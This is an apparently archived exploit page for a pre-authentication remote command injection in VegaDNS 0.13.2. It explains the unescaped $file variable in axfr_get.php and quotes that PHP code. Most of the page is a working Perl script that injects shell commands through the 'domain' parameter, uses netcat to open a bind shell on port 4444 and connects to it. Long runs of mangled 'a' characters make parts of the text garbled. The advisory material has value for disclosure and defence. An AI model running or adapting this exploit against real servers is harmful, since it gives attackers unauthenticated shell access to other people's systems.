Home / os / winmobile

VegaDNS 0.13.2 Remote Command Injection

Posted on 22 September 2016

#!/usr/bin/perl $izd= qq{ aaaaaaaaaaaaaa aaaaaaa aaa aaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaaaaa aaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa aaaaa aaa aaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaa aaa aaaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa aaa aaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaa aaaaaaa aaa aaaaaaaa aaa aaaaaaa aaa aaa aaaaaaa aaa };$vg=qq{ a aaaa aaaaaaa aa aa aaaaa aaaaaaaaaaaaaa aaa aaaa aaa aaa a aaaaa aaaaaaaaaaaaa a a aaa aaa aaaa aaaaaaaaaaa aaaaa aaaaa aaaa aaaaaaaaaaaaa aaaaaaa aaaaa aaaaa aaa aaaaaaaaaaaaa aaaaaaaaaa a aaaaaa aaaa aaaa aa aaa aaaaaaaaaaa aaaaa a a aa aaa aaaaaaa aaaaa aaaa aaa aa aaa aaaaaa aaaaa aaaa aaa aaaaa aa aaaaa aaa aaaa aaaaaaaaaa aaaaaaaaaa a aaaa aaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaaaaa aaa aaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaa aaa aaaa aaaaaaa aaaaaaaaaaaaaaaaaaaa aa a aaaaaa aa aaaaaaa aa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aa aa aaaaa aaa aaaaaaa aaa aaaaaaa a aaaaaa a a aaaaaaaaaaaaa aaa aaaaaa a aaaaa aaaaa a aa aaaaaaaaaa aaaaaaaaaaaa a aaaaa a aaa aaaaaaa a aaaaaaaaaaaaaa aaaaaaaa aaaaa aaaaa aaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa a aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa a aaaaaaaaaaaaaaaaaa a a a aa aaaaaaaaaaaaaaaaaaa aaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaa a aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa a a aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aa a aa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aaaa aaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aa aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa a aaaaaaaaaaaaaa aaaa aaaaaaaaaaaa a a a aaaa aaaaaaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaa a aaaaaaaaaaaaaa aa a aaaaa a a aaa aaaaaaaa a a a aaaaaaaaaaaaaaaaaa a aaa aaaaaaa aaaaa aa aaa aaaaaaaaa a aaa a a aaaa aaaaaaa aa a aaaaaa aaaaaa aa a a aaaaaa aaaaaaaa a a a a aaaaaaaaaaaaaaaaa a aa a aaaaaaaaaaaaaaaa a aaaaaaa aaaaaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaaaa };$b=qq{ aaa aaaaaaaaaaa aaaaaaa aaaaaa aaaaaaa aaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaa aaa aaaaaaaaaaaaaaa aaaaaaaaa aaaaaaaaaaa aaaa aaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaa aaaaaaaa aaaaaaa aaa aaaaaaaaaa aaa aaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaa aaaa aaaaaaa aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa aaa aaaaaaaaaaaaaa aaa aaaaaaaaaaaa aaa aaaaaaaa aaa aaaaaaaaaaaaaa aaa aaaaaaa aaa aaaaaaaa aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa aaaaaaa aaa aaa aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa aaaa aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa aaaaaaaa aaaaaaa aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa aaaaaaaa aaaaa aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa aaaaaaaa aaa aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa aaaaaaa aaa a aaa aaaa aaaaa aaaa aaaa aaaa aaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaa aaaaaa aaaaa aaaaa aaaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaaaaaaaaaa aaaaaaaaaaaa aaaa aaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa aaa aaa aaaaaaaaa aaa aaa aaa aaa aaa aa a aa aaa aa a aa a a aa aa a aaa aa aa a aaa aaa aa aaaa aa aaaa aaa a aa aaaaaaa aaaaaaaaaaaa aaaaaaaa aa aa aaa aaa aa aa a aa a a aa aaaa aaa aa a a aa aaa aaa aaaaaaaaaaaaa aa a a a a a aaaaaaaaaaaaa aaa a aaa a a aaa a aa aa aaaaaa a a a a aa a aaaaaa aa aaaaaa aaaaa a aa aa a aaaa aaaaaa aa a aaaaa aaaaa a aa a aa ___ .___ .______ ._______._____ .___.__ ._______ .____ .___ .___ | |: __|: __ : .____/:_ ___ : | : .___ | |___ | | : | /| || : || \____|| : _/ | |___| : || : | || | || | | |/ : || || : | / | / || . || : || : || |/ | / || || |___|_.: __/|. __ ||___| | \_. ___/ | || / |______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/ : : :/ : :/ : : : };$g=qq{ aaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa aaa aaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa To all the people with mad skills who share their knowledge: TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO, mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan, lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil, laughing_mantis, g0tm1k, nmrc, and many many more.... };$a=qq^ aaaaaa aaaa aaa aaaaaa aaa aaa aaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaa aaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaa aaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaal VegaDNS is a tinydns administration tool written in PHP to allow easy administration of DNS records through a web browser. -- http://www.vegadns.org The file axfr_get.php allows unauthenticated access and fails to correctly apply input escaping to all variables that is based on user input. This allows an attacker to inject shell syntax constructs to take control of the command execution. The following code from axfr_get.php shows how the variable $file becomes tainted trough the $domain variable which is tainted from direct user input. The application tries to prevent this by escaping the $domain and $hostname variables, but fails to escape the $file variable. ---------------------------cut--------------------------- * NOTE: * This functionality ONLY exists outside of the main application * because tcplient kept dying fatally due to file descriptor 7 * being unavailable, which only occurs AFTER session_start() is * called. * */ require_once 'src/config.php'; // CHECKS // Make sure the hostname was given if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") { echo "ERROR: no hostname given "; exit; } // Make sure that some domains were given if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") { echo "ERROR: no domain was supplied "; exit; } $domain = $_REQUEST['domain']; $hostname = $_REQUEST['hostname']; $rand = rand(); $file = "/tmp/$domain.$rand"; $command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1"; exec($command, $out); ---------------------------end--------------------------- aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa ^; print "$izd "." " x 17 . "VegaDNS pre-auth RCE exploit by @Wireghoul "; print " "."=" x 50 ."[justanotherhacker.com]== "; &usage if ($ARGV[0] !~ m!.+://([^/:]+)!); $h=$1; print " . . . Locating netcat "; $cmd='which+nc'; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -s -k '$t'`; if ($z !~ m{/nc}) { print " ! ! ! netcat not found! Manual exploitation required: "; print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b "; exit 1; } print " . . . netcat found: $z "; print " . . . Performing IZUNA DROP! "; # a A* a A* a A* a A* <img src="https://s.w.org/images/core/emoji/2/svg/2196.svg" alt="a" class="emoji" draggable="false"> A* <img src="https://s.w.org/images/core/emoji/2/svg/2197.svg" alt="a" class="emoji" draggable="false"> A* <img src="https://s.w.org/images/core/emoji/2/svg/2198.svg" alt="a" class="emoji" draggable="false"> A* <img src="https://s.w.org/images/core/emoji/2/svg/2199.svg" alt="a" class="emoji" draggable="false"> print " a a a *k* a a *p* "; $cmd="$z+-e+/bin/sh+-lp+4444"; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -m 3 -s -k '$t &'`; print $vg." "; print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444 "; system("nc -v $h 4444"); sub usage { print "Usage $0 http://host/path/to/vegadns $ARGV[0]"; exit;

 

TOP